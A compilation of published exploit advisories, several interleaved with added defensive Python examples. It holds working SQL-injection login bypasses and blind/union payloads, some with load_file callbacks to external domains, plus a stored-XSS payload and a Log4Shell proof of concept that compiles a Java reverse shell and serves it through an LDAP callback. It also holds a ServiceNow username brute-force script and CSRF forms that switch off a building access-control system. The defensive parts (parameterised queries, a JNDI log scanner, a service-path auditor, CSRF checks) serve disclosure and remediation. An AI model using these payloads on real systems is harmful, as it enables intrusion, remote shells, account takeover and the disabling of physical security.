<pre><code># Exploit Title: Simple Student Quarterly Result/Grade System 1.0 - SQLi Authentication Bypass<br /># Date: 11/02/2022<br /># Exploit Author: Saud Alenazi<br /># Vendor Homepage: https://www.sourcecodester.com/<br /># Software Link: https://www.sourcecodester.com/php/15169/simple-student-quarterly-resultgrade-system-php-and-mysql-free-source-code.html<br /># Version: 1.0<br /># Tested on: XAMPP, Linux <br /><br /><br /><br /><br /># Vulnerable Code<br /><br />line 57 in file "/sqgs/Actions.php"<br /><br />@$check= $this->db->query("SELECT count(admin_id) as `count` FROM admin_list where `username` = '{$username}' ".($id > 0 ? " and admin_id != '{$id}' " : ""))->fetch_array()['count'];<br /><br /><br />Steps To Reproduce:<br />* - Go to the login page http://localhost/sqgs/login.php<br /><br />Payload:<br /><br />username: admin ' or '1'='1'#--<br />password: \<br /><br /><br /><br />Proof of Concept :<br /><br />POST /sqgs/Actions.php?a=login HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: application/json, text/javascript, */*; q=0.01<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 51<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/sqgs/login.php<br />Cookie: PHPSESSID=v9a2mv23kc0gcj43kf6jeudk2v<br /><br />username=admin+'+or+'1'%3D'1'%23--&password=0xsaudi<br /><br /></code></pre>
<pre><code># Exploit Title: Online Thesis Archiving System 1.0 - SQLi Authentication Bypass & Stored (XSS)<br /># Exploit Author: Yehia Elghaly (YME)<br /># Vendor Homepage: https://www.sourcecodester.com/<br /># Software Link: https://www.sourcecodester.com/php/15083/online-thesis-archiving-system-using-phpoop-free-source-code.html<br /># Version: Online Thesis Archiving System 1.0<br /># Tested on: Windows, xampp<br /># CVE: N/A<br /><br />- Description: SQLi Authentication Bypass<br />A SQL injection vulnerability exists in Online Thesis Archiving System 1.0. An admin account takeover is possible with the payload admin' # or, alternatively, admin' or '1'='1<br /><br />PoC:<br /><br /><br />POST /otas/admin/login.php HTTP/1.1<br />Host: 192.168.113.130<br />User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 35<br />Origin: http://192.168.113.130<br />DNT: 1<br />Connection: close<br />Referer: http://192.168.113.130/otas/admin/login.php<br />Cookie: PHPSESSID=0jsudph494kpt2a5jvbvdvsrsc<br />Upgrade-Insecure-Requests: 1<br /><br />username=admin' #&password=admin' #<br /><br />- Description: Stored Cross Site Scripting (XSS)<br />Stored Cross Site Scripting (XSS) exists in Online Thesis Archiving System 1.0. Steps:<br />1- Go to (http://localhost/otas/admin/?page=departments) and (http://localhost/otas/admin/?page=curriculum)<br />2- Add a new (curriculum) or (department)<br />3- Insert your payload <script>("xssyf")</script><br /></code></pre>
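<p>Both advisories above (the Simple Student Quarterly Result/Grade System query at Actions.php line 57 and the Online Thesis Archiving System login) come down to the same defect: the username is interpolated into the SQL text, so a quote in the input ends the string literal and the remainder is parsed as SQL. The following Python block is an added example, not code from either advisory or either vendor; it rebuilds the login lookup against a constructed in-memory SQLite table (the admin_list schema and the plaintext password are assumptions for the demonstration) and runs the advisory's payload admin' or '1'='1 through a string-built query and through a parameterised one.</p>

```python
import sqlite3

# The bypass string shown in the advisories above; sent as both username and password.
PAYLOAD = "admin' or '1'='1"


def make_db():
    """Constructed in-memory stand-in for the applications' admin table (assumed schema).

    A real application must store a password hash, never the plaintext used here
    to keep the demonstration short.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE admin_list (admin_id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.execute("INSERT INTO admin_list (username, password) VALUES ('admin', 's3cret')")
    return conn


def login_vulnerable(conn, username, password):
    """Query assembled by string interpolation, the pattern behind Actions.php line 57.

    The quote in PAYLOAD closes the string literal and the rest becomes SQL, so the
    WHERE clause ends in `... OR '1'='1'` and matches every row.
    """
    sql = (
        "SELECT admin_id FROM admin_list WHERE `username` = '%s' AND `password` = '%s'"
        % (username, password)
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Same lookup with bound parameters: input is passed as data and is never parsed as SQL."""
    sql = "SELECT admin_id FROM admin_list WHERE `username` = ? AND `password` = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


def demo():
    """Run both variants against the payload and against the genuine credentials."""
    conn = make_db()
    return {
        "vulnerable_with_payload": login_vulnerable(conn, PAYLOAD, PAYLOAD),
        "safe_with_payload": login_safe(conn, PAYLOAD, PAYLOAD),
        "safe_with_real_creds": login_safe(conn, "admin", "s3cret"),
    }


if __name__ == "__main__":
    for name, admin_id in demo().items():
        print(f"{name}: {'logged in as admin_id=' + str(admin_id) if admin_id else 'rejected'}")
```

<p>The vulnerable variant returns admin_id 1 for the payload; the parameterised variant returns nothing for it and still authenticates the real credentials. In the PHP/mysqli code the advisories describe, the equivalent change is to use prepare() with bind_param() instead of building the query string.</p>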
<pre><code>## Title: Medical Store Management System v1.0 remote SQL-Injections<br />## Author: nu11secur1ty<br />## Date: 02.16.2022<br />## Vendor: https://github.com/abhisheks008<br />## Software: https://github.com/abhisheks008/Medical-Store-Management-System<br />## CVE-Medical Store Management System v1.0<br /><br /><br />## Description:<br />The `cid` parameter from the customer-add.php page of Medical Store<br />Management System v1.0 appears to be vulnerable to SQL injection<br />attacks.<br />The application took 20034 milliseconds to respond to the request,<br />compared with 36 milliseconds for the original request, indicating<br />that the injected SQL command caused a time delay.<br />The malicious actor can take control of the system administrator<br />accounts of this system!<br />WARNING: If this is in some external domain, or some subdomain, or<br />internal, this will be extremely dangerous!<br />Status: CRITICAL<br /><br /><br />[+] Payloads:<br /><br />```mysql<br />---<br />Parameter: cid (POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: cid=987101' AND (SELECT 7784 FROM (SELECT(SLEEP(3)))HbQW)<br />AND 'yDXs'='yDXs&cfname=Safia&clname=Malik&age=22'+(select<br />load_file('\\\\ej12det210osu6x32wsqrnyu6lce080wrzfr2kq9.https://github.com/abhisheks008/Medical-Store-Management-System\\tah'))+'&sex=Female&phno=9632587415&emid=safia@gmail.com&update=Update<br />---<br /><br />```<br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/abhisheks008/2022/Medical-Store-Management-System)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/p97tbi)<br /><br /></code></pre>
<pre><code># Exploit Title: Apache Log4j 2 - Remote Code Execution (RCE)<br /># Date: 11/12/2021<br /># Exploit Authors: kozmer, z9fr, svmorris<br /># Vendor Homepage: https://logging.apache.org/log4j/2.x/<br /># Software Link: https://github.com/apache/logging-log4j2<br /># Version: versions 2.0-beta-9 and 2.14.1.<br /># Tested on: Linux<br /># CVE: CVE-2021-44228<br /># Github repo: https://github.com/kozmer/log4j-shell-poc<br /><br />import subprocess<br />import os<br />import sys<br /><br />javaver = subprocess.call(['./jdk1.8.0_20/bin/java', '-version']) #stderr=subprocess.DEVNULL, stdout=subprocess.DEVNULL)<br />print("\n")<br /><br />userip = input("[+] Enter IP for LDAPRefServer & Shell: ")<br />userport = input("[+] Enter listener port for LDAPRefServer: ")<br />lport = input("[+] Set listener port for shell: ")<br /><br />def payload():<br /><br />    javapayload = ("""<br /><br />import java.io.IOException;<br />import java.io.InputStream;<br />import java.io.OutputStream;<br />import java.net.Socket;<br /><br />public class Exploit {<br /><br />    public Exploit() throws Exception {<br />        String host="%s";<br />        int port=%s;<br />        String cmd="/bin/sh";<br />        Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();<br />        Socket s=new Socket(host,port);<br />        InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();<br />        OutputStream po=p.getOutputStream(),so=s.getOutputStream();<br />        while(!s.isClosed()) {<br />            while(pi.available()>0)<br />                so.write(pi.read());<br />            while(pe.available()>0)<br />                so.write(pe.read());<br />            while(si.available()>0)<br />                po.write(si.read());<br />            so.flush();<br />            po.flush();<br />            Thread.sleep(50);<br />            try {<br />                p.exitValue();<br />                break;<br />            }<br />            catch (Exception e){<br />            }<br />        };<br />        p.destroy();<br />        s.close();<br />    }<br />}<br /><br />""") % (userip,lport)<br /><br />    f = open("Exploit.java", "w")<br />    f.write(javapayload)<br />    f.close()<br /><br />    os.system('./jdk1.8.0_20/bin/javac Exploit.java')<br /><br />    sendme = ("${jndi:ldap://%s:1389/a}") % (userip)<br />    print("[+] Send me: "+sendme+"\n")<br /><br />def marshalsec():<br />    os.system("./jdk1.8.0_20/bin/java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://{}:{}/#Exploit".format(userip, userport))<br /><br />if __name__== "__main__":<br />    payload()<br />    marshalsec()<br /></code></pre>
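<p>The string the PoC above hands to the target, ${jndi:ldap://host:1389/a}, is also the artefact a defender hunts for: it is logged verbatim by the vulnerable application, and the scheme and host inside it tell you where the JVM would have connected. The Python block below is an added example, not part of the PoC or of the Log4j project; it extracts JNDI lookup strings from log lines and lists the callback hosts to block and to search for in egress logs. The three log lines are constructed for the demonstration (TEST-NET addresses, invented timestamps). The fix for the vulnerability itself is upgrading Log4j; this only locates where lookup strings arrived.</p>

```python
import re
from urllib.parse import urlsplit

# A JNDI lookup in the form the PoC above sends: ${jndi:<scheme>:<target>}
JNDI_RE = re.compile(r"\$\{jndi:(?P<scheme>[a-z0-9+.-]+):(?P<rest>[^}]*)\}", re.IGNORECASE)

# Constructed sample lines: one web access log hit, one benign line, one application log hit.
SAMPLE_LOG = [
    '198.51.100.7 - - [11/Dec/2021:03:14:15 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://192.0.2.10:1389/a}"',
    '198.51.100.8 - - [11/Dec/2021:03:14:16 +0000] "GET /index.html HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '2021-12-11 03:14:17 INFO  LoginController - failed login for user ${jndi:rmi://192.0.2.11/Exploit}',
]


def find_jndi_lookups(line):
    """Return (scheme, host, port) for each JNDI lookup string found in one log line."""
    hits = []
    for m in JNDI_RE.finditer(line):
        scheme = m.group("scheme").lower()
        # urlsplit parses the host and port for any scheme when "//" follows it
        target = urlsplit(f"{scheme}:{m.group('rest')}")
        hits.append((scheme, target.hostname, target.port))
    return hits


def scan_log(lines):
    """Return one finding per lookup: (1-based line number, scheme, host, port)."""
    findings = []
    for lineno, line in enumerate(lines, start=1):
        for scheme, host, port in find_jndi_lookups(line):
            findings.append((lineno, scheme, host, port))
    return findings


def callback_hosts(findings):
    """Distinct hosts the vulnerable JVM would have contacted: block them and hunt for them in egress logs."""
    return sorted({host for _, _, host, _ in findings if host})


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for lineno, scheme, host, port in found:
        print(f"line {lineno}: {scheme} lookup -> {host}:{port}")
    print("block/hunt:", callback_hosts(found))
```

<p>Run it over real access or application logs one line at a time; a hit on an outbound LDAP or RMI connection to one of the returned hosts in firewall logs is the confirmation that the lookup was actually evaluated.</p>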
<pre><code># Exploit Title: ServiceNow - Username Enumeration<br /># Google Dork: NA<br /># Date: 12 February 2022<br /># Exploit Author: Victor Hanna (Trustwave SpiderLabs)<br /># Author Github Page: https://9lyph.github.io/CVE-2021-45901/<br /># Vendor Homepage: https://www.servicenow.com/<br /># Software Link: https://docs.servicenow.com/bundle/orlando-servicenow-platform/page/product/mid-server/task/t_DownloadMIDServerFiles.html<br /># Version: Orlando<br /># Tested on: MAC OSX<br /># CVE : CVE-2021-45901<br /><br />#!/usr/local/bin/python3<br /># Author: Victor Hanna (SpiderLabs)<br /># User enumeration script SNOW<br /># Requires valid 1. JSESSION (anonymous), 2. X-UserToken and 3. CSRF Token<br /><br />import requests<br />import re<br />import urllib.parse<br />from colorama import init<br />from colorama import Fore, Back, Style<br />import sys<br />import os<br />import time<br /><br />from urllib3.exceptions import InsecureRequestWarning<br />requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)<br /><br />def banner():<br />    print ("[+]********************************************************************************[+]")<br />    print ("| Author : Victor Hanna (9lyph)["+Fore.RED + "SpiderLabs" +Style.RESET_ALL+"]\t\t\t\t\t |")<br />    print ("| Description: SNOW Username Enumerator |")<br />    print ("| Usage : "+sys.argv[0]+" |")<br />    print ("| Prerequisite: \'users.txt\' needs to contain list of users |")<br />    print ("[+]********************************************************************************[+]")<br /><br />def main():<br />    os.system('clear')<br />    banner()<br />    proxies = {<br />        "http":"http://127.0.0.1:8080/",<br />        "https":"http://127.0.0.1:8080/"<br />    }<br />    url = "http://<redacted>/"<br />    try:<br />        # s = requests.Session()<br />        # s.verify = False<br />        r = requests.get(url, timeout=10, verify=False, proxies=proxies)<br />        JSESSIONID = r.cookies["JSESSIONID"]<br />        glide_user_route = r.cookies["glide_user_route"]<br />        startTime = (str(time.time_ns()))<br />        # print (startTime[:-6])<br />    except requests.exceptions.Timeout:<br />        print ("[!] Connection to host timed out !")<br />        sys.exit(1)<br />    except requests.exceptions.ProxyError:<br />        print ("[!] Can't communicate with proxy !")<br />        sys.exit(1)<br /><br />    with open ("users.txt", "r") as f:<br />        usernames = f.readlines()<br />    print (f"[+] Brute forcing ....")<br />    for users in usernames:<br />        url = "http://<redacted>/$pwd_reset.do?sysparm_url=ss_default"<br />        headers1 = {<br />            "Host": "<redacted>",<br />            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0",<br />            "Accept": "*/*",<br />            "Accept-Language": "en-US,en;q=0.5",<br />            "Accept-Encoding": "gzip, deflate",<br />            "Connection": "close",<br />            "Cookie": "glide_user_route="+glide_user_route+"; JSESSIONID="+JSESSIONID+"; __CJ_g_startTime=\'"+startTime[:-6]+"\'"<br />        }<br /><br />        try:<br />            # s = requests.Session()<br />            # s.verify = False<br />            r = requests.get(url, headers=headers1, timeout=20, verify=False, proxies=proxies)<br />            obj1 = re.findall(r"pwd_csrf_token", r.text)<br />            obj2 = re.findall(r"fireAll\(\"ck_updated\"", r.text)<br />            tokenIndex = (r.text.index(obj1[0]))<br />            startTime2 = (str(time.time_ns()))<br />            # userTokenIndex = (r.text.index(obj2[0]))<br />            # userToken = (r.text[userTokenIndex+23 : userTokenIndex+95])<br />            token = (r.text[tokenIndex+45:tokenIndex+73])<br />            url = "http://<redacted>/xmlhttp.do"<br />            headers2 = {<br />                "Host": "<redacted>",<br />                "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0",<br />                "Accept": "*/*",<br />                "Accept-Language": "en-US,en;q=0.5",<br />                "Accept-Encoding": "gzip, deflate",<br />                "Referer": "http://<redacted>/$pwd_reset.do?sysparm_url=ss default",<br />                "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",<br />                "Content-Length": "786",<br />                "Origin": "http://<redacted>/",<br />                "Connection": "keep-alive",<br />                # "X-UserToken":""+userToken+"",<br />                "Cookie": "glide_user_route="+glide_user_route+";JSESSIONID="+JSESSIONID+"; __CJ_g_startTime=\'"+startTime2[:-6]+"\'"<br />            }<br /><br />            data = {<br />                "sysparm_processor": "PwdAjaxVerifyIdentity",<br />                "sysparm_scope": "global",<br />                "sysparm_want_session_messages": "true",<br />                "sysparm_name":"verifyIdentity",<br />                "sysparm_process_id":"c6b0c20667100200a5a0f3b457415ad5",<br />                "sysparm_processor_id_0":"fb9b36b3bf220100710071a7bf07390b",<br />                "sysparm_user_id_0":""+users.strip()+"",<br />                "sysparm_identification_number":"1",<br />                "sysparam_pwd_csrf_token":""+token+"",<br />                "ni.nolog.x_referer":"ignore",<br />                "x_referer":"$pwd_reset.do?sysparm_url=ss_default"<br />            }<br /><br />            payload_str = urllib.parse.urlencode(data, safe=":+")<br /><br />        except requests.exceptions.Timeout:<br />            print ("[!] Connection to host timed out !")<br />            sys.exit(1)<br /><br />        try:<br />            # s = requests.Session()<br />            # s.verify = False<br />            time.sleep(2)<br />            r = requests.post(url, headers=headers2, data=payload_str, timeout=20, verify=False, proxies=proxies)<br />            if "500" in r.text:<br />                print (Fore.RED + f"[-] Invalid user: {users.strip()}" + Style.RESET_ALL)<br />                f = open("enumeratedUserList.txt", "a+")<br />                f.write(Fore.RED + f"[-] Invalid user: {users.strip()}\n" + Style.RESET_ALL)<br />                f.close()<br />            elif "200" in r.text:<br />                print (Fore.GREEN + f"[+] Valid user: {users.strip()}" + Style.RESET_ALL)<br />                f = open("enumeratedUserList.txt", "a+")<br />                f.write(Fore.GREEN + f"[+] Valid user: {users.strip()}\n" + Style.RESET_ALL)<br />                f.close()<br />            else:<br />                print (Fore.RED + f"[-] Invalid user: {users.strip()}" + Style.RESET_ALL)<br />                f = open("enumeratedUserList.txt", "a+")<br />                f.write(Fore.RED + f"[-] Invalid user: {users.strip()}\n" + Style.RESET_ALL)<br />                f.close()<br />        except KeyboardInterrupt:<br />            sys.exit()<br />        except requests.exceptions.Timeout:<br />            print ("[!] Connection to host timed out !")<br />            sys.exit(1)<br />        except Exception as e:<br />            print (Fore.RED + f"Unable to connect to host" + Style.RESET_ALL)<br /><br />if __name__ == "__main__":<br />    main ()<br /></code></pre>
<pre><code>## Title: Ticket Booking 1.0 suffers from SQL Injection<br />## Author: nu11secur1ty<br />## Date: 12.14.2021<br />## Vendor: https://code-projects.org/ticket-booking-in-php-with-source-code/<br />## Software: https://code-projects.org/ticket-booking-in-php-with-source-code/<br /><br />## Description:<br />The password parameter appears to be vulnerable to SQL injection<br />attacks. The payload '+(select<br />load_file('\\\\dl2edbuqvk9djxngyslxk9z7hynrbqzh25uslga.nu11secur1tyPenetrationTestingEngineer.net\\yba'))+'<br />was submitted in the password parameter.<br />This payload injects a SQL sub-query that calls MySQL's load_file<br />function with a UNC file path that references a URL on an external<br />domain.<br />The application interacted with that domain, indicating that the<br />injected SQL query was executed. The attacker can retrieve all<br />information from this system.<br /><br />[+] Payload:<br /><br />Parameter: email (POST)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)<br /> Payload: email=-9424' OR 1979=1979#&password=hacked' or<br />'4861'='4870&login_submit=<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: email=pwned@nu11secur1tyPenetrationTestingEngineer.net'<br />OR (SELECT 3647 FROM(SELECT COUNT(*),CONCAT(0x717a6b7a71,(SELECT<br />(ELT(3647=3647,1))),0x71716a7a71,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- RnIV&password=hacked' or<br />'4861'='4870&login_submit=<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: email=pwned@nu11secur1tyPenetrationTestingEngineer.net'<br />AND (SELECT 2804 FROM (SELECT(SLEEP(5)))urgo)-- taiV&password=hacked'<br />or '4861'='4870&login_submit=<br /><br /> Type: UNION query<br /> Title: MySQL UNION query (NULL) - 7 columns<br /> Payload: 
email=pwned@nu11secur1tyPenetrationTestingEngineer.net'<br />UNION ALL SELECT<br />NULL,CONCAT(0x717a6b7a71,0x5379666f7a4b7256695768444c63617a724465514467724f4c59744a4d574a6d4c697974424d4c47,0x71716a7a71),NULL,NULL,NULL,NULL,NULL#&password=hacked'<br />or '4861'='4870&login_submit=<br /><br />## Reproduce:<br />[href]()<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/vtr95i)<br /><br /></code></pre>
<pre><code># Exploit Title: Emerson PAC Machine Edition 9.80 Build 8695 - 'TrapiServer' Unquoted Service Path<br /># Discovery by: Luis Martinez<br /># Discovery Date: 2022-02-13<br /># Vendor Homepage: https://www.emerson.com/en-us<br /># Software Link : https://www.opertek.com/descargar-software/?prc=_326<br /># Tested Version: 9.80 Build 8695<br /># Vulnerability Type: Unquoted Service Path<br /># Tested on OS: Windows 10 Pro x64 es<br /><br /># Steps to discover the Unquoted Service Path:<br /><br />C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "TrapiServer" |findstr /i /v """<br /><br />Trapi File Server TrapiServer C:\Program Files (x86)\Emerson\PAC Machine Edition\Common\Components\NT\trapiserver.exe Auto<br /><br /><br /># Service info:<br /><br />C:\>sc qc TrapiServer<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: TrapiServer<br /> TYPE : 120 WIN32_SHARE_PROCESS (interactive)<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : C:\Program Files (x86)\Emerson\PAC Machine Edition\Common\Components\NT\trapiserver.exe<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : Trapi File Server<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br />#Exploit:<br /><br />A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.<br /><br /></code></pre>
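<p>The wmic and findstr pipeline above is a one-off check for a single service. The Python block below is an added example, not code from the advisory or from Emerson; it applies the same filter (auto-start, outside the Windows directory, binary path unquoted and containing spaces) to a list of service records and produces the corrected, quoted BINARY_PATH_NAME for each finding. The TrapiServer row reproduces the advisory's entry; the other rows are constructed for contrast.</p>

```python
import re

# Executable path as the Service Control Manager reads it: everything up to the first ".exe"
EXE_RE = re.compile(r"^(?P<exe>.*?\.exe)(?P<args>.*)$", re.IGNORECASE)

# Constructed records in the shape of the `wmic service get` output above:
# (name, pathname, startmode). The first row is the advisory's real TrapiServer entry.
SERVICES = [
    ("TrapiServer", r"C:\Program Files (x86)\Emerson\PAC Machine Edition\Common\Components\NT\trapiserver.exe", "Auto"),
    ("QuotedSvc", r'"C:\Program Files\Example\quotedsvc.exe" -run', "Auto"),
    ("NoSpaceSvc", r"C:\Tools\nospace.exe", "Auto"),
    ("ManualSvc", r"C:\Program Files\Example\manual.exe", "Manual"),
    ("WinSvc", r"C:\Windows\System32\svchost.exe -k netsvcs", "Auto"),
]


def is_unquoted_with_spaces(path_name):
    """True when the path is not quoted and the executable portion contains a space."""
    if path_name.startswith('"'):
        return False
    m = EXE_RE.match(path_name)
    return bool(m) and " " in m.group("exe")


def quoted_path(path_name):
    """The corrected BINARY_PATH_NAME: executable quoted, arguments left as they were."""
    m = EXE_RE.match(path_name)
    if not m:
        return path_name
    return '"%s"%s' % (m.group("exe"), m.group("args"))


def audit(services):
    """Apply the advisory's filter (auto-start, outside the Windows directory, unquoted) and return fixes."""
    findings = []
    for name, path_name, start_mode in services:
        if start_mode.lower() != "auto":
            continue
        if path_name.lower().startswith("c:\\windows\\"):
            continue
        if is_unquoted_with_spaces(path_name):
            findings.append((name, quoted_path(path_name)))
    return findings


if __name__ == "__main__":
    for name, fixed in audit(SERVICES):
        print(f"{name}: set binPath to {fixed}")
```

<p>For each finding the administrative fix is to rewrite the service's binary path with the executable quoted, for example with sc config and a binPath= value whose inner quotes are escaped; the quoted_path() output is the string to use.</p>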
<pre><code><!--<br /><br />Zucchetti Axess CLOKI Access Control 1.64 CSRF Disable Access Control<br /><br /><br />Vendor: Zucchetti Axess S.p.A.<br />Product web page: https://www.axesstmc.com<br />Affected version: 1.64<br /> 1.63<br /> 1.54<br /><br /><br />Summary: CLOKI is the pre-installed application on our terminals that<br />provides simple to use access control management and attendance monitoring<br />using any browser (IE, Chrome, Firefox, etc.). It is suited for anyone<br />looking for a stand-alone Access Control and Attendance Monitoring system<br />where the users' data is not frequently changed. Data management is simple<br />and intuitive and no additional software is needed on the PC intend to use<br />as WEB base. CLOKI for Access Control also allows configuration and monitoring<br />of access at all company entrances (doors, gates, turnstiles etc). The Access<br />Control manages any type of reader, entrance and access credential. Using an<br />impartial selector it is possible to check that employees do not take company<br />assets and allows registration of all accesses to the system and all operations<br />that users carry out.<br /><br />Desc: The application interface allows users to perform certain actions via HTTP<br />requests without performing any validity checks to verify the requests. 
These<br />actions can be exploited to perform authentication detriment and account password<br />change with administrative privileges if a logged-in user visits a malicious web<br />site.<br /><br />Tested on: Start X3 (h02 build 4163)<br /> Start X1 (g01 build 2804)<br /> X1/X2/X3/X4/X7 Web Server<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2021-5689<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5689.php<br /><br /><br />13.11.2021<br /><br />--><br /><br /><br />CSRF disable AC:<br />----------------<br /><html><br /> <body><br /> <form action="http://10.0.0.2:8081/redirect.cgi"><br /> <input type="hidden" name="flagAccessControlChanged" value="true" /><br /> <input type="hidden" name="RAct" value="5" /><br /> <input type="hidden" name="EnR" value="1" /><br /> <input type="hidden" name="ExR" value="1" /><br /> <input type="hidden" name="DenyRTout" value="5" /><br /> <input type="hidden" name="DenyR" value="0" /><br /> <input type="hidden" name="IType" value="0" /><br /> <input type="hidden" name="E485" value="on" /><br /> <input type="hidden" name="GType" value="0" /><br /> <input type="hidden" name="TOO" value="50" /><br /> <input type="hidden" name="TOC" value="50" /><br /> <input type="hidden" name="TOOE" value="100" /><br /> <input type="hidden" name="TOCE" value="100" /><br /> <input type="submit" value="Submit request" /><br /> </form><br /> </body><br /></html><br /><br /><br />CSRF enable AC:<br />---------------<br /><html><br /> <body><br /> <form action="http://10.0.0.2:8081/redirect.cgi"><br /> <input type="hidden" name="flagAccessControlChanged" value="true" /><br /> <input type="hidden" name="ACtrl" value="on" /><br /> <input type="hidden" name="RAct" value="5" /><br /> <input type="hidden" name="EnR" value="1" /><br /> <input type="hidden" name="ExR" value="1" /><br /> <input type="hidden" name="DenyRTout" value="5" /><br /> <input 
type="hidden" name="DenyR" value="0" /><br /> <input type="hidden" name="IType" value="0" /><br /> <input type="hidden" name="E485" value="on" /><br /> <input type="hidden" name="GType" value="0" /><br /> <input type="hidden" name="TOO" value="50" /><br /> <input type="hidden" name="TOC" value="50" /><br /> <input type="hidden" name="TOOE" value="100" /><br /> <input type="hidden" name="TOCE" value="100" /><br /> <input type="submit" value="Submit request" /><br /> </form><br /> </body><br /></html><br /></code></pre>
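<p>The two PoC forms above succeed because redirect.cgi accepts a settings change from any page that can make the browser send a request carrying the victim's session. The Python block below is an added example, not code from the advisory or from Zucchetti; it shows the server-side check that stops such a request: state changes only over POST, an Origin header that must match the device, and a per-session token compared in constant time. The session id, the secret key and the attacker origin are constructed values; the form fields are those of the PoC.</p>

```python
import hashlib
import hmac
import secrets

# Assumed server-side secret; in a real deployment it is generated once per device, never shared.
SECRET_KEY = secrets.token_bytes(32)
DEVICE_ORIGIN = "http://10.0.0.2:8081"   # the device address used in the PoC above


def issue_csrf_token(session_id):
    """Token bound to the logged-in session; embedded as a hidden field in the device's own forms."""
    return hmac.new(SECRET_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def check_state_change(method, session_id, form, origin):
    """Decide whether a request that changes access-control settings may proceed.

    Returns (allowed, reason). Three independent checks, any one of which stops the
    PoC forms above: they are plain GETs, carry no token, and come from another origin.
    """
    if method != "POST":
        return False, "settings changes are only accepted over POST"
    if origin is not None and origin != DEVICE_ORIGIN:
        return False, f"cross-origin request from {origin}"
    token = form.get("csrf_token", "")
    if not hmac.compare_digest(token, issue_csrf_token(session_id)):
        return False, "missing or invalid CSRF token"
    return True, "ok"


# Constructed: the parameters the "disable AC" PoC form submits.
ATTACK_FORM = {"flagAccessControlChanged": "true", "RAct": "5", "EnR": "1", "ExR": "1",
               "DenyRTout": "5", "DenyR": "0", "IType": "0", "E485": "on", "GType": "0",
               "TOO": "50", "TOC": "50", "TOOE": "100", "TOCE": "100"}


def demo(session_id="sess-constructed-123"):
    """Exercise the check with the PoC request and with a legitimate device-originated one."""
    legit_form = dict(ATTACK_FORM, ACtrl="on", csrf_token=issue_csrf_token(session_id))
    return {
        "poc_get_from_other_site": check_state_change("GET", session_id, ATTACK_FORM, "http://attacker.example")[0],
        "post_without_token": check_state_change("POST", session_id, ATTACK_FORM, DEVICE_ORIGIN)[0],
        "post_with_token_wrong_origin": check_state_change("POST", session_id, legit_form, "http://attacker.example")[0],
        "legitimate": check_state_change("POST", session_id, legit_form, DEVICE_ORIGIN)[0],
    }


if __name__ == "__main__":
    for case, allowed in demo().items():
        print(f"{case}: {'allowed' if allowed else 'rejected'}")
```

<p>The token is derived from the session id with an HMAC, so it needs no server-side storage and cannot be forged without SECRET_KEY; a SameSite=Lax or Strict attribute on the session cookie adds a browser-enforced layer on top of this check.</p>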
